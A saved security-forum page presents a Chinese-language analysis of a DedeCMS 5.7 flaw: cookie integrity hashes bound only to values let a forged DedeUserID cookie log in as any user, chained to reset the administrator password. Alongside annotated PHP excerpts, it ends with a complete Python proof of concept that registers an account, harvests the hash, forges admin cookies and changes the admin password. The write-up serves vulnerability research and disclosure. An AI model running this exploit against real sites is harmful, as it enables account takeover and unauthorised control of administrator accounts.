<!DOCTYPE html>
<!-- saved from url=(0046)https://xz.aliyun.com/t/1961?from=groupmessage -->
<html lang="zh-Hans"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <title>DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区</title>
    <meta name="description" content="先知社区，先知安全技术社区">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0">
    <link rel="icon" href="https://xz.aliyun.com/static/icon/favicon.ico" type="image/x-icon">
    <!-- Le styles -->
    <link href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/OverlayStyle.css">
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/editormd.min.css">
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/tango.css">
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/topic.css">
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/beautify.css">
    <link href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/bootstrap-responsive.min.css" rel="stylesheet">
    
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/editormd.css">
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/tango.css">
    <link rel="stylesheet" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/jquery.fancybox.min.css">

    <!--[if lte IE 8]>
        <script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
    <![endif]-->
    <!--[if !IE]> -->
    <script type="text/javascript" src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/jquery-2.1.3.min.js.下载"></script><style>html, * {-webkit-user-select:text!important; -moz-user-select:text!important;}</style>
    <!-- <![endif]-->
    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/bootstrap.min.js.下载"></script>
    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/xz.js.下载"></script>
    
    
    
    
    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/editormd.min.js.下载"></script>
    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/jquery.fancybox.min.js.下载"></script>
    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/modal.min.js.下载"></script>


</head>
<body>
<!-- main content begin -->
<div id="Wrapper" class="container">
    
    
    <div class="row2">
        <div class="span10">
            
    

    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/jquery.toc.min.js.下载"></script>
    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/toc.min.js.下载"></script>
    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/dt.js.下载"></script>


<div class="row box content">
    
    <div class="box-container">
        <div class="main-topic">
            <div class="clearfix user-info topic-list">
                <h1 class="content-title">DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC</h1>
                <div class="topic-info">
                <span class="info-left">
                    <a href="https://xz.aliyun.com/u/3582">
                        <span class="username cell"> 茜さす</span></a> <span class="i-seprator"> / </span>
                    <time datetime="2018-01-18T09:43:00"> 2018-01-18 09:43:00</time><span class="i-seprator"> / </span>
                    <span>浏览数 26193</span>
                    
                    
                    <span class="content-node">
                    
                        <span class="label label-default label-node-first">
                            <a href="https://xz.aliyun.com/tab/1">安全技术</a></span>
                        <span class="label label-default">
                            <a href="https://xz.aliyun.com/node/1">漏洞分析</a></span>
                    
                    </span>
                </span>
                </div>
            </div>
            <hr>
            <div id="topic_content" class="topic-content markdown-body">
                
<pre><code>前面的登录思路是来源于——Joseph
后面的组合扩大攻击来源于——zxc</code></pre>
<h3 id="toc-0">简述</h3>
<p>Dedecms是一款开源的PHP网站管理系统。</p>
<p>DeDecms(织梦CMS)  V5.7.72 正式版20180109 (最新版)</p>
<p>前台会员模块是采用Cookie中的 DedeUserID+DedeUserID__ckMd5字段进行身份鉴别</p>
<p>DedeUserID用于定位区别用户，DedeUserID__ckMd5则是服务器生成散列，用于安全验证</p>
<p>Dedecms一处代码由于逻辑不够严谨，导致可以输入字符并获得服务器生成散列</p>
<p>劫持DedeUserID__ckMd5字段，绕过安全校验，配合类型转换造成任意用户登录漏洞</p>
<h3 id="toc-1">漏洞详细原理</h3>
<p>文件位置:dedecms/member/index.php:110行</p>

<pre><code>require_once(DEDEMEMBER . '/inc/config_space.php');
if ($action == '') {
    include_once(DEDEINC . "/channelunit.func.php");
    $dpl = new DedeTemplate();
    $tplfile = DEDEMEMBER . "/space/{$_vars['spacestyle']}/index.htm";
    //更新最近访客记录及站点统计记录
    $vtime = time();
    $last_vtime = GetCookie('last_vtime');
    $last_vid = GetCookie('last_vid');
    if (empty($last_vtime)) {
        $last_vtime = 0;
    }
    if ($vtime - $last_vtime &gt; 3600 || !preg_match('#,' . $uid . ',#i', ',' . $last_vid . ',')) {

        if ($last_vid != '') {
            $last_vids = explode(',', $last_vid);
            $i = 0;
            $last_vid = $uid;
            foreach ($last_vids as $lsid) {
                if ($i &gt; 10) {
                    break;
                } else if ($lsid != $uid) {
                    $i++;
                    $last_vid .= ',' . $last_vid;
                }
            }
        } else {
            $last_vid = $uid;
        }
        PutCookie('last_vtime', $vtime, 3600 * 24, '/');
        PutCookie('last_vid', $last_vid, 3600 * 24, '/');</code></pre>
<p>这段函数中$uid是我们可控的，如果Cookie中last_vid字段不存在就会走进这个分支</p>

<pre><code>} else {
            $last_vid = $uid;
        }</code></pre>
<p>也就变为<code>$last_vid</code>可控，然后<code>$last_vid</code>经过<code>PutCookie</code>函数进行处理</p>
<h3 id="toc-2">顺便一提</h3>
<p>文件位置：dedecms/include/helpers/cookie.helper.php</p>
<p>PutCookie这个函数是Dedecms在setcookie时封装的函数</p>
<p>GetCookie这个函数是Dedecms在获取Cookie中值封装的函数</p>
<p>如果Set一个键值对，PutCookie会Set两对Cookie，一个是要SET的键值对</p>
<p>另一个是将站点密钥<code>$cfg_cookie_encode</code>与值拼接后做md5再截取前十六位的安全校验字符串(键名为<code>$key+'__ckMd5'</code>)</p>

<pre><code>if ( ! function_exists('PutCookie'))
{
    // Sets the cookie $key=$value and a companion "$key__ckMd5" tag that GetCookie() checks.
    // NOTE(review): the tag is substr(md5($cfg_cookie_encode . $value), 0, 16) and does not
    // cover $key, so a tag issued for one cookie name (e.g. last_vid) is equally valid for
    // any other cookie carrying the same value (e.g. DedeUserID). A keyed MAC over key and
    // value (hash_hmac) checked with hash_equals() would bind the tag to the cookie it protects.
    function PutCookie($key, $value, $kptime=0, $pa="/")
    {
        global $cfg_cookie_encode,$cfg_domain_cookie;
        setcookie($key, $value, time()+$kptime, $pa,$cfg_domain_cookie);
        setcookie($key.'__ckMd5', substr(md5($cfg_cookie_encode.$value),0,16), time()+$kptime, $pa,$cfg_domain_cookie);
    }
}</code></pre>
<p>GetCookie在返回键值之前，会通过PutCookie生成的十六位安全校验字符串对键值进行安全校验</p>
<p>确保获得的键值对有效且为服务器Set,增强安全性（但这里并不能抵御密文重放）</p>

<pre><code>if ( ! function_exists('GetCookie'))
{
    // Returns $_COOKIE[$key] only when the companion "$key__ckMd5" cookie equals the tag
    // PutCookie() would generate for that value; returns '' otherwise.
    function GetCookie($key)
    {
        global $cfg_cookie_encode;
        if( !isset($_COOKIE[$key]) || !isset($_COOKIE[$key.'__ckMd5']) )
        {
            return '';
        }
        else
        {
            // NOTE(review): the expected tag depends on the value alone, not on $key, so this
            // proves "the server once tagged this value", not "the server set this cookie":
            // a tag obtained for last_vid is accepted here for DedeUserID. The loose `!=`
            // comparison of a hash is also weaker than hash_equals().
            if($_COOKIE[$key.'__ckMd5']!=substr(md5($cfg_cookie_encode.$_COOKIE[$key]),0,16))
            {
                return '';
            }
            else
            {
                return $_COOKIE[$key];
            }
        }
    }
}</code></pre>
<p>在<code>$last_vid</code>经过PutCookie函数处理后，我们已经可以在Cookie中获得其校验哈希；由于校验哈希只与值绑定而不与键名绑定，同一个哈希同样能通过<code>DedeUserID</code>的安全校验</p>
<h3 id="toc-3">Payload注入点</h3>
<p>文件位置:dedecms/include/memberlogin.class.php:161行</p>

<pre><code>// Builds the current front-end member session from cookies and the member table.
// NOTE(review): the identity comes from the DedeUserID cookie, whose only integrity
// check is the value-only "__ckMd5" tag verified inside GetCookie().
function __construct($kptime = -1, $cache=FALSE)
{
    global $dsql;
    if($kptime==-1){
        $this-&gt;M_KeepTime = 3600 * 24 * 7;
    }else{
        $this-&gt;M_KeepTime = $kptime;
    }
    $formcache = FALSE;
    // GetNum() is not shown in this excerpt; per the write-up a value such as "0000001" survives it.
    $this-&gt;M_ID = $this-&gt;GetNum(GetCookie("DedeUserID"));
    $this-&gt;M_LoginTime = GetCookie("DedeLoginTime");
    $this-&gt;fields = array();
    $this-&gt;isAdmin = FALSE;
    if(empty($this-&gt;M_ID))
    {
        $this-&gt;ResetUser();
    }else{
        // NOTE(review): intval("0000001") is 1, so a cookie value tagged for a freshly
        // registered account named 0000001 now selects mid=1. A strict comparison of the
        // cookie value with the canonical id string would avoid this collapse.
        $this-&gt;M_ID = intval($this-&gt;M_ID);
        if ($cache)
        {
            $this-&gt;fields = GetCache($this-&gt;memberCache, $this-&gt;M_ID);
            if( empty($this-&gt;fields) )
            {
                $this-&gt;fields = $dsql-&gt;GetOne("Select * From `#@__member` where mid='{$this-&gt;M_ID}' ");
            } else {
                $formcache = TRUE;
            }
        } else {
            // The member row fetched by the (now integer) id drives every session field below.
            $this-&gt;fields = $dsql-&gt;GetOne("Select * From `#@__member` where mid='{$this-&gt;M_ID}' ");
        }

        if(is_array($this-&gt;fields)){
            #api{{
            if(defined('UC_API') &amp;&amp; @include_once DEDEROOT.'/uc_client/client.php')
            {
                if($data = uc_get_user($this-&gt;fields['userid']))
                {
                    if(uc_check_avatar($data[0]) &amp;&amp; !strstr($this-&gt;fields['face'],UC_API))
                    {
                        $this-&gt;fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&amp;size=middle';
                        $dsql-&gt;ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this-&gt;fields['face']."' WHERE `mid`='{$this-&gt;M_ID}'");
                    }
                }
            }
            #/aip}}

            // Refresh the stored login time at most once per hour
            if(time() - $this-&gt;M_LoginTime &gt; 3600)
            {
                $dsql-&gt;ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this-&gt;fields['mid']."';");
                PutCookie("DedeLoginTime",time(),$this-&gt;M_KeepTime);
            }
            $this-&gt;M_LoginID = $this-&gt;fields['userid'];
            $this-&gt;M_MbType = $this-&gt;fields['mtype'];
            $this-&gt;M_Money = $this-&gt;fields['money'];
            $this-&gt;M_UserName = FormatUsername($this-&gt;fields['uname']);
            $this-&gt;M_Scores = $this-&gt;fields['scores'];
            $this-&gt;M_Face = $this-&gt;fields['face'];
            $this-&gt;M_Rank = $this-&gt;fields['rank'];
            $this-&gt;M_Spacesta = $this-&gt;fields['spacesta'];
            $sql = "Select titles From #@__scores where integral&lt;={$this-&gt;fields['scores']} order by integral desc";
            $scrow = $dsql-&gt;GetOne($sql);
            $this-&gt;fields['honor'] = $scrow['titles'];
            $this-&gt;M_Honor = $this-&gt;fields['honor'];
            // Administrator status is derived solely from the member row's matt column.
            if($this-&gt;fields['matt']==10) $this-&gt;isAdmin = TRUE;
            $this-&gt;M_UpTime = $this-&gt;fields['uptime'];
            $this-&gt;M_ExpTime = $this-&gt;fields['exptime'];
            $this-&gt;M_JoinTime = MyDate('Y-m-d',$this-&gt;fields['jointime']);
            if($this-&gt;M_Rank&gt;10 &amp;&amp; $this-&gt;M_UpTime&gt;0){
                $this-&gt;M_HasDay = $this-&gt;Judgemember();
            }
            if( !$formcache )
            {
                SetCache($this-&gt;memberCache, $this-&gt;M_ID, $this-&gt;fields, 1800);
            }
        }else{
            $this-&gt;ResetUser();
        }
    }
}</code></pre>
<p>我们注入0000001(注册账户的账户名)和对应的<code>__ckMd5</code>校验值</p>

<pre><code>$this-&gt;M_ID = $this-&gt;GetNum(GetCookie("DedeUserID"));</code></pre>
<p>这里必须注册名为0000001的账户，不然无法通过另一个校验页面（校验账户是否存在）</p>
<p>文件位置：dedecms/member/inc/config_space.php</p>

<pre><code>if(!is_array($_vars))
{
    ShowMsg("你访问的用户可能已经被删除！","javascript:;");
    exit();
}</code></pre>
<p><code>$this-&gt;M_ID</code>赋值后变为0000001，然后经过intval类型转换变为1，也就是admin的id（同理也可以构造成任意用户的id）</p>

<pre><code>$this-&gt;M_ID = intval($this-&gt;M_ID);</code></pre>
<p>然后带入了SQL查询语句，然后使用查询结果对登录信息进行赋值，造成任意用户登录。</p>

<pre><code>else {
    $this-&gt;fields = $dsql-&gt;GetOne("Select * From `#@__member` where mid='{$this-&gt;M_ID}' ");
}

if(is_array($this-&gt;fields)){
    #api{{
    if(defined('UC_API') &amp;&amp; @include_once DEDEROOT.'/uc_client/client.php')
    {
        if($data = uc_get_user($this-&gt;fields['userid']))
        {
            if(uc_check_avatar($data[0]) &amp;&amp; !strstr($this-&gt;fields['face'],UC_API))
            {
                $this-&gt;fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&amp;size=middle';
                $dsql-&gt;ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this-&gt;fields['face']."' WHERE `mid`='{$this-&gt;M_ID}'");
            }
        }
    }
    #/aip}}

    //间隔一小时更新一次用户登录时间
    if(time() - $this-&gt;M_LoginTime &gt; 3600)
    {

        $dsql-&gt;ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this-&gt;fields['mid']."';");
        PutCookie("DedeLoginTime",time(),$this-&gt;M_KeepTime);
    }
    $this-&gt;M_LoginID = $this-&gt;fields['userid'];
    $this-&gt;M_MbType = $this-&gt;fields['mtype'];
    $this-&gt;M_Money = $this-&gt;fields['money'];
    $this-&gt;M_UserName = FormatUsername($this-&gt;fields['uname']);
    $this-&gt;M_Scores = $this-&gt;fields['scores'];
    $this-&gt;M_Face = $this-&gt;fields['face'];
    $this-&gt;M_Rank = $this-&gt;fields['rank'];
    $this-&gt;M_Spacesta = $this-&gt;fields['spacesta'];
    $sql = "Select titles From #@__scores where integral&lt;={$this-&gt;fields['scores']} order by integral desc";
    $scrow = $dsql-&gt;GetOne($sql);
    $this-&gt;fields['honor'] = $scrow['titles'];
    $this-&gt;M_Honor = $this-&gt;fields['honor'];
    if($this-&gt;fields['matt']==10) $this-&gt;isAdmin = TRUE;
    $this-&gt;M_UpTime = $this-&gt;fields['uptime'];
    $this-&gt;M_ExpTime = $this-&gt;fields['exptime'];
    $this-&gt;M_JoinTime = MyDate('Y-m-d',$this-&gt;fields['jointime']);</code></pre>
<h1 id="toc-4">漏洞演示</h1>
<p>①注册0000001账户（用于登录admin,其他账户类推）</p>
<p>②注入Payload并获安全校验值</p>
<p><a id="img0" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd660970-fbf1-1.png"><img src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd660970-fbf1-1.png"></a></p>
<p>③</p>
<p><a id="img1" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd840a88-fbf1-1.png"><img src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd840a88-fbf1-1.png"></a></p>
<p><strong>漏洞更深入(管理员密码重置)</strong><br>
①利用之前的老漏洞重置admin的密码，这时只重置了member表里面的admin密码<br>
②利用现在这个漏洞登录admin，然后访问member/edit_baseinfo.php页面；该页面修改信息时的旧密码判断是与member表进行对比，而这正好在上面的步骤①中被重置了<br>
③满足条件后，修改密码时会同时修改admin、member两张表的密码<br>
文件位置:dedecms/member/edit_baseinfo.php:109行</p>

<pre><code>if( !in_array($sex, array('男','女','保密')) )
{
    ShowMsg('请选择正常的性别！','-1');
    exit();    
}

// NOTE(review): the old-password check preceding this excerpt (per the write-up) compares
// against the member table, so a member session for this M_ID plus that table's password
// is all that is required to reach the updates below.
$query1 = "UPDATE `#@__member` SET pwd='$pwd',sex='$sex'{$addupquery} where mid='".$cfg_ml-&gt;M_ID."' ";
$dsql-&gt;ExecuteNoneQuery($query1);

// If the member is an administrator, also update the back-end password
// NOTE(review): the back-end credential is rewritten solely because the cookie-derived
// member identity (M_ID) has matt==10; a front-end member session is therefore enough to
// change an admin-table password. Re-authenticating against the admin table here (or not
// sharing ids between the two tables) would contain this.
if($cfg_ml-&gt;fields['matt']==10 &amp;&amp; $pwd2!="")
{
    $query2 = "UPDATE `#@__admin` SET pwd='$pwd2' where id='".$cfg_ml-&gt;M_ID."' ";
    $dsql-&gt;ExecuteNoneQuery($query2);
}
// Clear the member cache
$cfg_ml-&gt;DelCache($cfg_ml-&gt;M_ID);
ShowMsg('成功更新你的基本资料！','edit_baseinfo.php',0,5000);
exit();</code></pre>
<h3 id="toc-5">POC</h3>
<div class="highlight"><pre><span></span><span class="c1"># coding=utf-8</span>

<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">re</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
    <span class="n">dede_host</span> <span class="o">=</span> <span class="s2">"http://127.0.0.1/"</span>
    <span class="n">oldpwd</span> <span class="o">=</span> <span class="s1">'123456'</span>
    <span class="n">newpwd</span> <span class="o">=</span> <span class="s2">"cnvdcnvd"</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">Session</span><span class="p">()</span>

    <span class="k">if</span> <span class="s1">'系统关闭了会员功能'</span> <span class="ow">in</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'member/reg_new.php'</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="nb">exit</span><span class="p">(</span><span class="s1">'The system has closed the member function .Can not attack !!!'</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"The system opened the membership function, I wish you good luck  !!"</span>

    <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"Referer"</span><span class="p">:</span> <span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"member/reg_new.php"</span><span class="p">}</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'include/vdimgck.php'</span><span class="p">)</span><span class="o">.</span><span class="n">content</span>
    <span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'1.jpg'</span><span class="p">,</span> <span class="s2">"wb"</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">rs</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>

    <span class="n">vdcode</span> <span class="o">=</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">"Please enter the registration verification code : "</span><span class="p">)</span>

    <span class="n">userid</span> <span class="o">=</span> <span class="s1">'0000001'</span>
    <span class="n">uname</span> <span class="o">=</span> <span class="s1">'0000001'</span>
    <span class="n">userpwd</span> <span class="o">=</span> <span class="s1">'123456'</span>


    <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"User-Agent"</span><span class="p">:</span> <span class="s2">"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0)"</span><span class="p">,</span>
               <span class="s2">"Content-Type"</span><span class="p">:</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">}</span>
    <span class="n">data</span> <span class="o">=</span> <span class="s2">"dopost=regbase&amp;step=1&amp;mtype=</span><span class="si">%E</span><span class="s2">4%B8%AA</span><span class="si">%E</span><span class="s2">4%BA%BA&amp;mtype=</span><span class="si">%E</span><span class="s2">4%B8%AA</span><span class="si">%E</span><span class="s2">4%BA%BA&amp;userid={userid}&amp;uname={uname}&amp;userpwd={userpwd}&amp;userpwdok={userpwd}&amp;email=0000001%400000001.com&amp;safequestion=0&amp;safeanswer=&amp;sex=</span><span class="si">%E</span><span class="s2">7</span><span class="si">%94%</span><span class="s2">B7&amp;vdcode={vdcode}&amp;agree="</span><span class="o">.</span><span class="n">format</span><span class="p">(</span>
        <span class="n">userid</span><span class="o">=</span><span class="n">userid</span><span class="p">,</span> <span class="n">uname</span><span class="o">=</span><span class="n">uname</span><span class="p">,</span> <span class="n">userpwd</span><span class="o">=</span><span class="n">userpwd</span><span class="p">,</span> <span class="n">vdcode</span><span class="o">=</span><span class="n">vdcode</span><span class="p">)</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'/member/reg_new.php'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
    <span class="k">if</span> <span class="s2">"验证码错误"</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="nb">exit</span><span class="p">(</span><span class="s2">"Verification code error, account registration failed"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="s1">'注册成功'</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="k">print</span> <span class="s1">'registration success !!'</span>

    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"/member/index.php?uid={userid}"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">userid</span><span class="o">=</span><span class="n">userid</span><span class="p">))</span>
    <span class="k">if</span> <span class="s2">"资料尚未通过审核"</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="nb">exit</span><span class="p">(</span><span class="s2">"User information has not been approved !!!"</span><span class="p">)</span>  <span class="c1"># 会员使用权限开通状态(-10 邮件验证 -1 手工审核, 0 没限制)：</span>
    <span class="n">searchObj</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'last_vid__ckMd5=(.*?);'</span><span class="p">,</span> <span class="n">rs</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">'Set-Cookie'</span><span class="p">],</span> <span class="n">re</span><span class="o">.</span><span class="n">M</span> <span class="o">|</span> <span class="n">re</span><span class="o">.</span><span class="n">I</span><span class="p">)</span>
    <span class="n">last_vid__ckMd5</span> <span class="o">=</span> <span class="n">searchObj</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">s</span><span class="o">.</span><span class="n">cookies</span><span class="p">[</span><span class="s1">'DedeUserID'</span><span class="p">]</span> <span class="o">=</span> <span class="n">userid</span>
    <span class="n">s</span><span class="o">.</span><span class="n">cookies</span><span class="p">[</span><span class="s1">'DedeUserID__ckMd5'</span><span class="p">]</span> <span class="o">=</span> <span class="n">last_vid__ckMd5</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"/member/index.php"</span><span class="p">)</span>
    <span class="k">if</span> <span class="s2">"class=</span><span class="se">\"</span><span class="s2">userName</span><span class="se">\"</span><span class="s2">&gt;admin&lt;/a&gt;"</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"Administrator login successful !!"</span>

    <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"Referer"</span><span class="p">:</span> <span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"member/edit_baseinfo.php"</span><span class="p">}</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'include/vdimgck.php'</span><span class="p">)</span><span class="o">.</span><span class="n">content</span>
    <span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'2.jpg'</span><span class="p">,</span> <span class="s2">"wb"</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">rs</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>

    <span class="n">vdcode</span> <span class="o">=</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">"Please enter the verification code : "</span><span class="p">)</span>

    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"dopost"</span><span class="p">:</span> <span class="s2">"save"</span><span class="p">,</span> <span class="s2">"uname"</span><span class="p">:</span> <span class="s2">"admin"</span><span class="p">,</span> <span class="s2">"oldpwd"</span><span class="p">:</span> <span class="n">oldpwd</span><span class="p">,</span> <span class="s2">"userpwd"</span><span class="p">:</span> <span class="n">newpwd</span><span class="p">,</span> <span class="s2">"userpwdok"</span><span class="p">:</span> <span class="n">newpwd</span><span class="p">,</span>
            <span class="s2">"safequestion"</span><span class="p">:</span> <span class="s2">"0"</span><span class="p">,</span> <span class="s2">"newsafequestion"</span><span class="p">:</span> <span class="s2">"0"</span><span class="p">,</span> <span class="s2">"sex"</span><span class="p">:</span> <span class="s2">"男"</span><span class="p">,</span> <span class="s2">"email"</span><span class="p">:</span> <span class="s2">"admin@admin.com"</span><span class="p">,</span> <span class="s2">"vdcode"</span><span class="p">:</span> <span class="n">vdcode</span><span class="p">}</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'/member/edit_baseinfo.php'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>
    <span class="k">if</span> <span class="s2">"成功更新你的基本资料"</span> <span class="ow">in</span>  <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
       <span class="k">print</span> <span class="s2">"Administrator password modified successfully !!"</span>
       <span class="k">print</span> <span class="s2">"The new administrator password is : "</span> <span class="o">+</span> <span class="n">newpwd</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"attack fail"</span>
</pre></div>
<p></p>
                
            </div>
            

            
        
        </div>
    </div>
</div>



    <!-- topic & appendix -->
    



<div class="row box">
    <ol class="breadcrumb">
        <li class="active">1 条回复</li>
    </ol>
    <div class="box-container post-container">
        
            
                <ul class="post-info" id="reply-9665">
                    <li>
                        <div class="row1 user-info clearfix">
                            
                                <img class="avatar pull-left tiny-avatar" src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/default_avatar.png">
                            
                            <span class="post-info ">
                                 
                                <a class="label label-default" href="https://xz.aliyun.com/u/1083">tany</a>
                                
                                <span class="bbs-time">2018-01-25 14:29:43</span>

                            </span>
                            <div class="post-content markdown-body">
                                <p>学习了，感谢，测试了一下帐号用/d/w*的方式也可以登录对应的id</p>

                            </div>
                            <div class="manual-box">
                                <span class="thumbs " data-action="post" data-pk="9665" data-topic="1961"><i class="fa fa-thumbs-o-up"></i><span>0</span></span>
                                <span class="reply-jump reply reply-count " data-nickname="tany">回复Ta</span>
                            </div>
                        </div>

                        <hr>
                    </li>
                </ul>
            
        
    </div>
</div>


    <!-- posts of topic -->
    
    
    <!-- editor for post -->
    

        </div>
    </div>


</div>






<option value="Google">谷歌翻译</option> <option value="GoogleCN">谷歌翻译（国内）</option> </select> <st-div class="__action-list__"> <st-div class="__button__ __btn-translate__">翻译 <st-span class="st-icon-down-dir"></st-span> </st-div> <st-div class="__expand__"> <st-div class="__button__">朗读</st-div> <st-div class="__button__">复制</st-div> </st-div> </st-div> </st-div> </st-div> <st-div class="__translate-result__" style="display: none;">正在查询，请稍候……</st-div> <st-div class="__translate-result__"> <st-div style="display: none;"> <st-span></st-span> <st-span class="__retry__">重试</st-span> </st-div> <st-div> <st-div class="__phonetic__"> <st-span style="display: none;"></st-span> <st-span class="__copy-and-read__"> <st-span>朗读</st-span> <st-span style="display: none;">复制</st-span> </st-span> </st-div> <st-div style="display: none;"> <st-ul>  </st-ul> <st-div class="__copy-and-read__"> <st-span class="__copy-and-read__">复制</st-span> </st-div> </st-div> <st-div style="display: none;">  <st-div class="__copy-and-read__"> <st-span class="__copy-and-read__">朗读</st-span> <st-span class="__copy-and-read__">复制</st-span> </st-div> </st-div> </st-div> </st-div> <st-footer> <st-span style="">via <a target="_blank" href="https://xz.aliyun.com/t/1961?from=groupmessage">谷歌翻译（国内）</a></st-span> </st-footer> </st-div> <st-div class="__st-btn__" style="display: none; position: 